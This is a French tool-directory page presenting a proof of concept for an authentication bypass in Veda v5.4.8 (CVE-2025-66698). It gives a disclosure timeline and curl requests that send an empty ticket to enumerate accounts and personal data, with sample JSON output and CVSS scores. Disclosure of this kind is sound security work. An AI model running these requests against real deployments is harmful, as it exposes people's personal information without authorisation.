Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-66698 — Preuve de concept pour CVE-2025-66698 : contournement d'authentification dans Veda v5.4.8 via un paramètre ticket vide, permettant l'énumération d'utilisateurs, de politiques et d'informations personnelles identifiables (PII) via des points de terminaison API non authentifiés. | Kitploit
Outils/GitHubGitHub/perunchess/cve-2025-66698
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsAuthentification
GitHubperunchess/cve-2025-66698

CVE-2025-66698

Preuve de concept pour CVE-2025-66698 : contournement d'authentification dans Veda v5.4.8 via un paramètre ticket vide, permettant l'énumération d'utilisateurs, de politiques et d'informations personnelles identifiables (PII) via des points de terminaison API non authentifiés.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
3il y a 7 moisPas encore vérifié

CVE-2025-66698

Logiciel cible : Veda (Semantic Machines) v5.4.8 (probablement toutes les versions antérieures). Type de vulnérabilité : Contournement d'authentification. ID CVE : CVE-2025-66698. Résumé : Le système valide incorrectement le paramètre ticket, traitant une chaîne vide comme une session valide. Lien du projet : Veda (Semantic Machines)

18 novembre 2025 : Découverte et première demande de CVE. 9 janvier 2026 : ID CVE attribué. Tentative de contact avec l'éditeur (ignoré et supprimé). 13 janvier 2026 : Divulgation publique en raison de l'absence de réponse de l'éditeur.

Cette vulnérabilité a été découverte lors de mes recherches en sécurité en examinant le code. Le paramètre ticket dans le code ne vérifie pas la valeur vide.

Quelques points de terminaison d'API concernés :

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (renvoie "true")

Il existe de nombreux utilisateurs par défaut que vous pouvez énumérer, vous pouvez également changer le schéma : cfg en v-s, etc. pour énumérer les utilisateurs, les politiques, les PII (noms complets, photographies, titres, dates de naissance et coordonnées), etc.

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

Tout ce que vous avez à faire est de trouver de plus en plus ces entités "xxx:xxx" (cfg:xxx, v-s:xxx, etc.). Vous pouvez écrire un simple script bash pour cela. Il existe également un systicket codé en dur pour obtenir le même résultat.

Évaluation CVSS :

  • Vecteur CVSS 3.1 : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Score : 8.6 (Élevé)
  • Vecteur CVSS 4.0 : AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Score : 9.3 (Critique)
Télécharger l’outil